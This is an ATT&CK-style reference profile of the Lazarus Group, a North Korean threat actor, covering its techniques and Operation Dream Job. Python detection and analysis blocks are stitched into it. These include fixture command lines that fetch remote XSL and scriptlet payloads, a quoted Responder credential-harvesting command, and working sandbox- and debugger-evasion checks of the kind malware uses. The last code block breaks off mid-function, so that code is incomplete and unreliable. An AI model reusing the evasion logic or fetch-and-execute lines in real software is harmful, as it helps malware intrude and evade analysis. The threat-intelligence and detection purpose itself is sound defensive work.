Lazarus Group

Lazarus Group is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.[1][2] The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by Lazarus Group correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.[3]

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups, such as Andariel, APT37, APT38, and Kimsuky.

ID: G0032
Associated Groups: Labyrinth Chollima, HIDDEN COBRA, Guardians of Peace, ZINC, NICKEL ACADEMY, Diamond Sleet
Contributors: Kyaw Pyiyt Htet, @KyawPyiytHtet; Dragos Threat Intelligence; MyungUk Han, ASEC; Jun Hirata, NEC Corporation; Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India
Version: 4.1
Created: 31 May 2017
Last Modified: 16 April 2025

Associated Group Descriptions

Labyrinth Chollima [4]
HIDDEN COBRA: The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.[1][5]
Guardians of Peace [1]
ZINC [6]
NICKEL ACADEMY [7]
Diamond Sleet [8]

Campaigns

C0022 Operation Dream Job
First Seen: September 2019 [9]
Last Seen: August 2020 [10]
References: [10][11][12][9]
Techniques: Windows Management Instrumentation, XSL Script Processing, Data from Local System, Masquerading: Masquerade File Type, Impersonation, Internal Spearphishing, Encrypted Channel: Symmetric Cryptography, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Compromise Infrastructure: Domains, Compromise Infrastructure: Server, Application Layer Protocol: Web Protocols, Establish Accounts: Social Media Accounts, Establish Accounts: Email Accounts, Develop Capabilities: Code Signing Certificates, Develop Capabilities: Malware, Archive Collected Data: Archive via Utility, Search Open Websites/Domains: Social Media, Gather Victim Org Information, Gather Victim Org Information: Identify Roles, Gather Victim Identity Information, File and Directory Discovery, Stage Capabilities: Upload Malware, Stage Capabilities: Upload Tool, Brute Force, Server Software Component: IIS Components, Native API, Template Injection, Obfuscated Files or Information: Software Packing, Obfuscated Files or Information: Encrypted/Encoded File, User Execution: Malicious Link, User Execution: Malicious File, Indicator Removal: File Deletion, System Binary Proxy Execution: Rundll32, System Binary Proxy Execution: Regsvr32, System Location Discovery: System Language Discovery, Acquire Infrastructure: Server, Acquire Infrastructure: Domains, Acquire Infrastructure: Web Services, Obtain Capabilities: Code Signing Certificates, Obtain Capabilities: Tool, Virtualization/Sandbox Evasion: System Checks, Virtualization/Sandbox Evasion: Time Based Evasion, Debugger Evasion, Account Discovery: Domain Account, Ingress Tool Transfer, Exfiltration Over C2 Channel, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Phishing: Spearphishing via Service, Phishing: Spearphishing Attachment, Phishing: Spearphishing Link, Scheduled Task/Job: Scheduled Task, Subvert Trust Controls: Code Signing

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows Management Instrumentation

Lazarus Group has used WMIC for discovery as well as to execute payloads for persistence and lateral movement.[3][13][14][15]

During Operation Dream Job, Lazarus Group used WMIC to execute a remote XSL script.[9]

Enterprise T1220 XSL Script Processing

During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader.[9]

Enterprise T1557 .001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay

Lazarus Group executed Responder using the command [Responder file path] -i [IP address] -rPv on a compromised host to harvest credentials and move laterally.[14]

Enterprise T1005 Data from Local System

Lazarus Group has collected data and files from compromised networks.[3][16][13][14]

During Operation Dream Job, Lazarus Group used malicious Trojans and DLL files to exfiltrate data from an infected host.[10][11]

Enterprise T1090 .001 Proxy: Internal Proxy

Lazarus Group has used a compromised router to serve as a proxy between a victim network's corporate and restricted segments.[14]

.002 Proxy: External Proxy

Lazarus Group has used multiple proxies to obfuscate network traffic from victims.[17][18]

Enterprise T1036 .003 Masquerading: Rename System Utilities

Lazarus Group has renamed system utilities such as wscript.exe and mshta.exe.[15]

.004 Masquerading: Masquerade Task or Service

Lazarus Group has used a scheduled task named SRCheck to mask the execution of a malicious .dll.[19]

.005 Masquerading: Match Legitimate Name or Location

Lazarus Group has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.[20][15]

.008 Masquerading: Masquerade File Type

During Operation Dream Job, Lazarus Group disguised malicious template files as JPEG files to avoid detection.[11][9]

Enterprise T1656 Impersonation

During Operation Dream Job, Lazarus Group impersonated HR hiring personnel through LinkedIn messages and conducted interviews with victims in order to deceive them into downloading malware.[10][9][21]

Enterprise T1534 Internal Spearphishing

During Operation Dream Job, Lazarus Group conducted internal spearphishing from within a compromised organization.[10]

Enterprise T1543 .003 Create or Modify System Process: Windows Service

Several Lazarus Group malware families install themselves as new services.[3][22]

Enterprise T1573 .001 Encrypted Channel: Symmetric Cryptography

Several Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another Lazarus Group malware sample XORs C2 traffic. Other Lazarus Group malware uses Caracachs encryption to encrypt C2 payloads. Lazarus Group has also used AES to encrypt C2 traffic.[3][22][23][24]

During Operation Dream Job, Lazarus Group used an AES key to communicate with their C2 server.[11]

Enterprise T1574 .002 Hijack Execution Flow: DLL Side-Loading

Lazarus Group has replaced win_fw.dll, an internal component that is executed during IDA Pro installation, with a malicious DLL to download and execute a payload.[19]

.013 Hijack Execution Flow: KernelCallbackTable

Lazarus Group has abused the KernelCallbackTable to hijack process control flow and execute shellcode.[25][15]

Enterprise T1620 Reflective Code Loading

Lazarus Group has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking. Lazarus Group has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime.[25][15]

Enterprise T1140 Deobfuscate/Decode Files or Information

Lazarus Group has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime.[25][15]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Lazarus Group has maintained persistence by loading malicious code into a startup folder or by adding a Registry Run key.[3][13][23][25]

During Operation Dream Job, Lazarus Group placed LNK files into the victims' startup folder for persistence.[11]

.009 Boot or Logon Autostart Execution: Shortcut Modification

Lazarus Group malware has maintained persistence on a system by creating a LNK shortcut in the user’s Startup folder.[23]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Lazarus Group has used PowerShell to execute commands and malicious code.[26]

During Operation Dream Job, Lazarus Group used PowerShell commands to explore the environment of compromised victims.[9]

.003 Command and Scripting Interpreter: Windows Command Shell

Lazarus Group malware uses cmd.exe to execute commands on a compromised host.[3][22][23][27][15] A Destover-like variant used by Lazarus Group uses a batch file mechanism to delete its binaries from the system.[24]

During Operation Dream Job, Lazarus Group launched malicious DLL files, created new folders, and renamed folders with the use of the Windows command shell.[9][11]

.005 Command and Scripting Interpreter: Visual Basic

Lazarus Group has used VBA and embedded macros in Word documents to execute malicious code.[25][15]

During Operation Dream Job, Lazarus Group executed a malicious VBA macro after victims downloaded malicious DOTM files; Lazarus Group also used Visual Basic macro code to extract a double Base64-encoded DLL implant.[10][11]

Enterprise T1008 Fallback Channels

Lazarus Group malware SierraAlfa sends data to one of the hard-coded C2 servers chosen at random, and if the transmission fails, chooses a new C2 server to attempt the transmission again.[3][13]

Enterprise T1584 .001 Compromise Infrastructure: Domains

For Operation Dream Job, Lazarus Group compromised domains in Italy and other countries for their C2 infrastructure.[11][12]

.004 Compromise Infrastructure: Server

Lazarus Group has compromised servers to stage malicious tools.[14]

For Operation Dream Job, Lazarus Group compromised servers to host their malicious tools.[10][9][11]

Enterprise T1104 Multi-Stage Channels

Lazarus Group has used multi-stage malware components that inject later stages into separate processes.[25]

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.[3][16][28][27]

.004 Impair Defenses: Disable or Modify System Firewall

Various Lazarus Group malware modifies the Windows firewall to allow incoming connections, or disables it entirely, using netsh.[3][16][28]

Enterprise T1203 Exploitation for Client Execution

Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.[29]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Lazarus Group has conducted C2 over HTTP and HTTPS.[23][30][18][25][15][19]

During Operation Dream Job, Lazarus Group used HTTP and HTTPS to contact actor-controlled C2 servers.[11]

Enterprise T1010 Application Window Discovery

Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground.[3][16][28]

Enterprise T1585 .001 Establish Accounts: Social Media Accounts

Lazarus Group has created new Twitter accounts to conduct social engineering against potential victims.[26]

For Operation Dream Job, Lazarus Group created fake LinkedIn accounts for their targeting efforts.[10][9]

.002 Establish Accounts: Email Accounts

Lazarus Group has created new email accounts for spearphishing operations.[14]

During Operation Dream Job, Lazarus Group created fake email accounts to correspond with fake LinkedIn personas; Lazarus Group also established email accounts to match those of the victim as part of their BEC attempt.[9]

Enterprise T1587 .001 Develop Capabilities: Malware

Lazarus Group has developed custom malware for use in their operations.[31][26]

For Operation Dream Job, Lazarus Group developed custom tools such as Sumarta, DBLL Dropper, Torisma, and DRATzarus for their operations.[10][9][11][12]

.002 Develop Capabilities: Code Signing Certificates

During Operation Dream Job, Lazarus Group digitally signed their malware and the dbxcli utility.[9]

Enterprise T1560 Archive Collected Data

Lazarus Group has compressed exfiltrated data with RAR and used RomeoDelta malware to archive specified directories in .zip format, encrypt the .zip file, and upload it to C2.[16][13][23]

.001 Archive via Utility

During Operation Dream Job, Lazarus Group archived victim's data into a RAR file.[9]

.002 Archive via Library

Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.[13][23]

.003 Archive via Custom Method

A Lazarus Group malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.[3][16][13][23]

Enterprise T1593 .001 Search Open Websites/Domains: Social Media

For Operation Dream Job, Lazarus Group used LinkedIn to identify and target employees within a chosen organization.[9]

Enterprise T1591 Gather Victim Org Information

Lazarus Group has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals.[14]

For Operation Dream Job, Lazarus Group gathered victim organization information to identify specific targets.[10]

.004 Identify Roles

During Operation Dream Job, Lazarus Group targeted specific individuals within an organization with tailored job vacancy announcements.[10][9]

Enterprise T1589 .002 Gather Victim Identity Information: Email Addresses

Lazarus Group collected email addresses belonging to various departments of a targeted organization which were used in follow-on phishing campaigns.[14]

Enterprise T1074 .001 Data Staged: Local Data Staging

Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.[3][16]

Enterprise T1001 .003 Data Obfuscation: Protocol or Service Impersonation

Lazarus Group malware uses a form of communication encryption known as FakeTLS that mimics a TLS session but applies its own encryption method, potentially evading SSL/TLS traffic inspection and decryption.[3][22][23][32]

Enterprise T1132 .001 Data Encoding: Standard Encoding

A Lazarus Group malware sample encodes data with base64.[23]

Enterprise T1485 Data Destruction

Lazarus Group has used a custom secure delete function to overwrite file contents with data from heap memory.[3]

Enterprise T1083 File and Directory Discovery

Lazarus Group malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.[3][24][25][15]

During Operation Dream Job, Lazarus Group conducted word searches within documents on a compromised host in search of security and financial matters.[10]

Enterprise T1608 .001 Stage Capabilities: Upload Malware

For Operation Dream Job, Lazarus Group used compromised servers to host malware.[10][9][11][12]

.002 Stage Capabilities: Upload Tool

For Operation Dream Job, Lazarus Group used multiple servers to host malicious tools.[9]

Enterprise T1110 .003 Brute Force: Password Spraying

Lazarus Group malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.[3][13]
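The permutations-of-Administrator behaviour described above leaves a recognisable shape in Windows Security event 4625 (logon failure) data: one source, many distinct target accounts, one or two failures each, which stays under per-account lockout thresholds that classic brute force would trip. The block below is an added Python example, not ATT&CK's or any vendor's code; the 4625 records, IP addresses and account names are constructed, and the window and thresholds are assumptions to tune per environment.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed Windows Security event 4625 (logon failure) records, not real telemetry:
# (timestamp, source workstation IP, target account name).
SAMPLE_4625: List[Tuple[str, str, str]] = [
    ("2020-06-01T02:00:01", "10.0.5.23", "Administrator"),
    ("2020-06-01T02:00:04", "10.0.5.23", "administrator1"),
    ("2020-06-01T02:00:07", "10.0.5.23", "admin"),
    ("2020-06-01T02:00:11", "10.0.5.23", "Admin01"),
    ("2020-06-01T02:00:15", "10.0.5.23", "adm"),
    ("2020-06-01T02:00:19", "10.0.5.23", "administrateur"),
    ("2020-06-01T02:00:23", "10.0.5.23", "sysadmin"),
    ("2020-06-01T02:00:27", "10.0.5.23", "backup"),
    ("2020-06-01T02:00:31", "10.0.5.23", "guest"),
    ("2020-06-01T02:00:35", "10.0.5.23", "svc_sql"),
    # A user mistyping a password five times: high volume, one account, not spraying.
    ("2020-06-01T02:01:00", "10.0.7.9", "jsmith"),
    ("2020-06-01T02:01:05", "10.0.7.9", "jsmith"),
    ("2020-06-01T02:01:10", "10.0.7.9", "jsmith"),
    ("2020-06-01T02:01:15", "10.0.7.9", "jsmith"),
    ("2020-06-01T02:01:20", "10.0.7.9", "jsmith"),
    # Too few distinct accounts to count as a spray.
    ("2020-06-01T02:02:00", "10.0.9.2", "alice"),
    ("2020-06-01T02:02:30", "10.0.9.2", "bob"),
]

# Names built from "Administrator": the bare word, truncations such as adm/admin, and suffixed variants.
ADMIN_LIKE = re.compile(r"^adm(in(istrator)?)?[\w.\-]*$", re.IGNORECASE)


def looks_like_admin_permutation(user: str) -> bool:
    return ADMIN_LIKE.match(user) is not None


def find_spraying(records: List[Tuple[str, str, str]], window: timedelta = timedelta(minutes=10),
                  min_users: int = 8, max_per_user: int = 2) -> List[Dict]:
    """Flag a source that fails against many distinct accounts, few times each, inside one window.

    Classic brute force has the opposite shape (one account, many failures) and trips lockout;
    spraying stays under the per-account lockout threshold, so the signal is account breadth.
    """
    by_src: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, src, user in records:
        by_src[src].append((datetime.fromisoformat(ts), user))
    alerts = []
    for src, evs in by_src.items():
        evs.sort()
        best = None
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:  # slide the window's left edge forward
                start += 1
            counts = Counter(u.lower() for _, u in evs[start:end + 1])
            if len(counts) >= min_users and max(counts.values()) <= max_per_user:
                if best is None or len(counts) > best["distinct_users"]:
                    best = {
                        "source": src,
                        "window_start": evs[start][0].isoformat(),
                        "window_end": evs[end][0].isoformat(),
                        "distinct_users": len(counts),
                        "admin_like_users": sum(1 for u in counts if looks_like_admin_permutation(u)),
                    }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in find_spraying(SAMPLE_4625):
        print(alert)
```

In production the same shape is worth computing per source IP and per logon type (SMB share access to ADMIN$ shows up as logon type 3), and the admin-name heuristic should be treated as an enrichment on the alert rather than a precondition, since the generated username list may be wider than Administrator permutations.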

Enterprise T1048 .003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.[3][13]

Enterprise T1078 Valid Accounts

Lazarus Group has used administrator credentials to gain access to restricted network segments.[14]

Enterprise T1489 Service Stop

Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.[22]

Enterprise T1505 .004 Server Software Component: IIS Components

During Operation Dream Job, Lazarus Group targeted Windows servers running Internet Information Services (IIS) to install C2 components.[11]

Enterprise T1106 Native API

Lazarus Group has used the Windows API ObtainUserAgentString to obtain the User-Agent from a compromised host to connect to a C2 server.[11] Lazarus Group has also used various, often lesser-known, API functions to perform various types of Discovery and Process Injection.[25][15]

During Operation Dream Job, Lazarus Group used Windows API ObtainUserAgentString to obtain the victim's User-Agent and used the value to connect to their C2 server.[11]

Enterprise T1012 Query Registry

Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnywhere, and Remote Desktop. Another Lazarus Group malware sample checks for the presence of the following Registry key: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt.[3][16][23]

Enterprise T1221 Template Injection

During Operation Dream Job, Lazarus Group used DOCX files to retrieve a malicious document template/DOTM file.[10][11]

Enterprise T1189 Drive-by Compromise

Lazarus Group delivered RATANKBA and other malicious code to victims via a compromised legitimate website.[33][26]

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

During Operation Dream Job, Lazarus Group packed malicious .db files with Themida to evade detection.[10][11][12]

.007 Obfuscated Files or Information: Dynamic API Resolution

Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.[25]

.013 Obfuscated Files or Information: Encrypted/Encoded File

Lazarus Group has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for Native API function names.[3][16][13][23][18][25][15]

During Operation Dream Job, Lazarus Group encrypted malware such as DRATzarus with XOR and DLL files with base64.[10][9][11][12]

Enterprise T1204 .001 User Execution: Malicious Link

During Operation Dream Job, Lazarus Group lured users into executing a malicious link to disclose private account information or provide initial access.[10][9]

.002 User Execution: Malicious File

Lazarus Group has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.[29][14][25][15]

During Operation Dream Job, Lazarus Group lured victims into executing malicious documents that contained "dream job" descriptions from defense, aerospace, and other sectors.[10][11]

Enterprise T1561 .001 Disk Wipe: Disk Content Wipe

Lazarus Group has used malware like WhiskeyAlfa to overwrite the first 64MB of every drive with a mix of static and random buffers. A similar process is then used to wipe content in logical drives and, finally, attempt to wipe every byte of every sector on every drive. WhiskeyBravo can be used to overwrite the first 4.9MB of physical drives. WhiskeyDelta can overwrite the first 132MB or 1.5MB of each drive with random data from heap memory.[22]

.002 Disk Wipe: Disk Structure Wipe

Lazarus Group malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine and has possessed MBR wiper malware since at least 2009.[27][3]

Enterprise T1070 Indicator Removal

Lazarus Group has restored malicious KernelCallbackTable code to its original state after the process execution flow has been hijacked.[25]

.003 Clear Command History

Lazarus Group has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.[14]

.004 File Deletion

Lazarus Group malware has deleted files in various ways, including "suicide scripts" to delete malware binaries from the victim. Lazarus Group also uses secure file deletion to delete files from the victim.[3][24]

During Operation Dream Job, Lazarus Group removed all previously delivered files from a compromised computer.[9]

.006 Timestomp

Several Lazarus Group malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.[3][22][16][24]

Enterprise T1491 .001 Defacement: Internal Defacement

Lazarus Group replaced the background wallpaper of systems with a threatening image after rendering the system unbootable with a Disk Structure Wipe.[22]

Enterprise T1218 System Binary Proxy Execution

Lazarus Group LNK files used for persistence have abused the Windows Update Client (wuauclt.exe) to execute a malicious DLL.[25][15]

.005 Mshta

Lazarus Group has used mshta.exe to execute HTML pages downloaded by initial access documents.[25][15]

.010 Regsvr32

During Operation Dream Job, Lazarus Group used regsvr32 to execute malware.[9]

.011 Rundll32

Lazarus Group has used rundll32 to execute malicious payloads on a compromised host.[19]

During Operation Dream Job, Lazarus Group executed malware with C:\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db", CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905.[10][9][11]
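The WMIC remote-XSL, Mshta, Regsvr32 and Rundll32 entries above share one detection shape: a signed Windows binary proxying execution of something it should not be loading (a remote or .xsl "stylesheet", a scriptlet, an HTML page, or a module that is not a DLL and lives under ProgramData). The following Python is an added example, not ATT&CK's or any vendor's detection content, that applies those checks to constructed Sysmon-style process-creation events, including the thumbnail.db rundll32 command line quoted above; the event field names, the example.invalid URLs and the user-writable path list are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events for illustration (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r'wmic os get /format:"https://example.invalid/update.xsl"'},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'C:\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db", CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905'},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r'regsvr32 /s /n /u /i:https://example.invalid/s.sct scrobj.dll'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta C:\Users\user\AppData\Local\Temp\page.htm'},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL'},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": r'wmic process list brief'},
]

REMOTE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
USER_WRITABLE = re.compile(r"^[a-z]:\\(programdata|users|windows\\temp)\\", re.IGNORECASE)
BENIGN_MODULE_EXT = {".dll", ".cpl"}  # what rundll32 legitimately loads


def split_args(cmd: str) -> List[str]:
    """Minimal Windows command-line tokenizer: quoted spans stay together, quotes are dropped."""
    return [t.replace('"', "") for t in re.findall(r'"[^"]*"|\S+', cmd)]


def classify(event: Dict[str, str]) -> List[str]:
    """Return technique labels for one process-creation event (empty list if nothing suspicious)."""
    exe = event["image"].rsplit("\\", 1)[-1].lower()
    args = split_args(event["command_line"])
    low = [a.lower() for a in args]
    # Drop the leading token when it is the binary itself, so args[0] is the first real argument.
    if low and low[0].rsplit("\\", 1)[-1] in (exe, exe[:-4]):
        args, low = args[1:], low[1:]
    hits: List[str] = []
    if exe == "wmic.exe":
        for a in low:
            if a.startswith("/format:"):
                target = a[len("/format:"):]
                if REMOTE.match(target) or target.endswith(".xsl"):
                    hits.append("T1220 XSL Script Processing (WMIC /format pointing at an XSL file)")
    elif exe == "regsvr32.exe":
        if "scrobj.dll" in low or any(a.startswith("/i:") and REMOTE.match(a[3:]) for a in low):
            hits.append("T1218.010 Regsvr32 (scriptlet / remote /i: argument)")
    elif exe == "rundll32.exe" and args:
        module = args[0].split(",")[0]  # "<module>,<export>" or "<module>" followed by the export
        ext = ("." + module.rsplit(".", 1)[-1].lower()) if "." in module else ""
        if ext not in BENIGN_MODULE_EXT or USER_WRITABLE.match(module):
            hits.append("T1218.011 Rundll32 (module is not a .dll/.cpl or lives in a user-writable path)")
    elif exe == "mshta.exe":
        if any(REMOTE.match(a) or a.endswith((".hta", ".htm", ".html")) for a in low):
            hits.append("T1218.005 Mshta (HTA/HTML page execution)")
    return hits


def detect(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run classify() over a batch and keep only the events that matched."""
    out = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            out.append((i, hits))
    return out


if __name__ == "__main__":
    for idx, hits in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['command_line']}")
        for h in hits:
            print(f"    -> {h}")
```

The rundll32 rule is the noisiest of the four in practice: some installers and control-panel applets hand rundll32 unusual module names, so baseline the (module, export) pairs seen in your estate before alerting on every non-.dll module, and treat a module under ProgramData or a user profile as the high-confidence case.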

Enterprise T1614 .001 System Location Discovery: System Language Discovery

During Operation Dream Job, Lazarus Group deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.[10]

Enterprise T1082 System Information Discovery

Several Lazarus Group malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by Lazarus Group also collects disk space information and sends it to its C2 server.[3][22][16][23][24][25]

Enterprise T1529 System Shutdown/Reboot

Lazarus Group has rebooted systems after destroying files and wiping the MBR on infected systems.[27]

Enterprise T1033 System Owner/User Discovery

Various Lazarus Group malware enumerates logged-on users.[3][22][16][13][23][30][25]

Enterprise T1124 System Time Discovery

A Destover-like implant used by Lazarus Group can obtain the current system time and send it to the C2 server.[24]

Enterprise T1049 System Network Connections Discovery

Lazarus Group has used net use to identify and establish a network connection with a remote host.[14]

Enterprise T1016 System Network Configuration Discovery

Lazarus Group malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.[3][16]

Enterprise T1102 .002 Web Service: Bidirectional Communication

Lazarus Group has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories.[25]

Enterprise T1046 Network Service Discovery

Lazarus Group has used nmap from a router VM to scan ports on systems within the restricted segment of an enterprise network.[14]

Enterprise T1583 .001 Acquire Infrastructure: Domains

Lazarus Group has acquired domains related to their campaigns to act as distribution points and C2 channels.[31][26]

During Operation Dream Job, Lazarus Group registered a domain name identical to that of a compromised company as part of their BEC effort.[9]

.004 Acquire Infrastructure: Server

During Operation Dream Job, Lazarus Group acquired servers to host their malicious tools.[9]

.006 Acquire Infrastructure: Web Services

Lazarus Group has hosted malicious downloads on GitHub.[31]

During Operation Dream Job, Lazarus Group used file hosting services such as Dropbox and OneDrive.[10]

Enterprise T1588 .002 Obtain Capabilities: Tool

Lazarus Group has obtained a variety of tools for their operations, including Responder and PuTTY PSCP.[14]

For Operation Dream Job, Lazarus Group obtained tools such as Wake-On-Lan, Responder, ChromePass, and dbxcli.[10][9]

.003 Obtain Capabilities: Code Signing Certificates

During Operation Dream Job, Lazarus Group used code signing certificates issued by Sectigo RSA for some of its malware and tools.[9]

.004 Obtain Capabilities: Digital Certificates

Lazarus Group has obtained SSL certificates for their C2 domains.[31]

Enterprise T1497 .001 Virtualization/Sandbox Evasion: System Checks

During Operation Dream Job, Lazarus Group used tools that conducted a variety of system checks to detect sandboxes or VMware services.[10]

.003 Virtualization/Sandbox Evasion: Time Based Evasion

During Operation Dream Job, Lazarus Group used tools that collected GetTickCount and GetSystemTimeAsFileTime data to detect sandbox or VMware services.[10]

Enterprise T1134 .002 Access Token Manipulation: Create Process with Token

Lazarus Group keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call CreateProcessAsUserA under that user's context.[3][28]

Enterprise T1622 Debugger Evasion

During Operation Dream Job, Lazarus Group used tools that used the IsDebuggerPresent call to detect debuggers.[10]
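What the language check (System Language Discovery entry above), the GetTickCount/GetSystemTimeAsFileTime comparison (Time Based Evasion) and the IsDebuggerPresent check amount to in code, as an added example that is not Lazarus Group tooling and not ATT&CK content. It is written for sandbox operators, who need to know what a detonation environment must get right: a Chinese, Japanese or Korean UI locale, a patched Sleep(), or a fast-forwarded wall clock each makes a guardrailed sample exit before doing anything observable. The LANGID arithmetic and the FILETIME unit are Windows facts; the 500 ms tolerance, the 30 s delay in the constructed values, and the probe_windows helper are assumptions.

```python
import sys
from typing import Dict

# Windows primary-language IDs (low 10 bits of a LANGID), values from winnt.h.
LANG_CHINESE, LANG_JAPANESE, LANG_KOREAN = 0x04, 0x11, 0x12
EXCLUDED_PRIMARY_LANGS = {LANG_CHINESE, LANG_JAPANESE, LANG_KOREAN}
FILETIME_TICKS_PER_MS = 10_000  # FILETIME counts 100-nanosecond intervals


def primary_language(langid: int) -> int:
    """PRIMARYLANGID(): the sublanguage lives in the top 6 bits, the primary language in the low 10."""
    return langid & 0x3FF


def locale_is_excluded(langid: int) -> bool:
    """Guardrail of the kind described for Operation Dream Job: do not run on zh/ja/ko UI languages."""
    return primary_language(langid) in EXCLUDED_PRIMARY_LANGS


def sleep_was_tampered(tick_before: int, tick_after: int, ft_before: int, ft_after: int,
                       requested_ms: int, tolerance_ms: int = 500) -> bool:
    """Compare two independent clocks around a Sleep(requested_ms).

    GetTickCount (ms since boot, 32-bit wraparound) and GetSystemTimeAsFileTime (wall clock)
    normally advance together. A sandbox that patches Sleep() to return early leaves both
    far below the requested delay; one that fast-forwards only the wall clock leaves the
    two clocks disagreeing. Either way the sample concludes it is being analysed.
    """
    tick_elapsed = (tick_after - tick_before) & 0xFFFFFFFF  # survive the 49.7-day wrap
    ft_elapsed_ms = (ft_after - ft_before) // FILETIME_TICKS_PER_MS
    if tick_elapsed + tolerance_ms < requested_ms:
        return True
    if abs(tick_elapsed - ft_elapsed_ms) > tolerance_ms:
        return True
    return False


def analysis_environment_detected(langid: int, tick_before: int, tick_after: int,
                                  ft_before: int, ft_after: int, requested_ms: int,
                                  debugger_present: bool) -> Dict[str, bool]:
    """Combine the three checks; 'abort' is what a guardrailed sample would act on."""
    result = {
        "locale_excluded": locale_is_excluded(langid),
        "sleep_tampered": sleep_was_tampered(tick_before, tick_after, ft_before, ft_after, requested_ms),
        "debugger_present": debugger_present,
    }
    result["abort"] = any(result.values())
    return result


def probe_windows(requested_ms: int = 2000) -> Dict[str, bool]:
    """Collect the real inputs on Windows via ctypes (assumed helper; not callable elsewhere)."""
    import ctypes
    from ctypes import wintypes
    k32 = ctypes.windll.kernel32
    k32.GetTickCount.restype = wintypes.DWORD
    k32.GetUserDefaultUILanguage.restype = wintypes.WORD
    k32.IsDebuggerPresent.restype = wintypes.BOOL

    def filetime_now() -> int:
        ft = wintypes.FILETIME()
        k32.GetSystemTimeAsFileTime(ctypes.byref(ft))
        return (ft.dwHighDateTime << 32) | ft.dwLowDateTime

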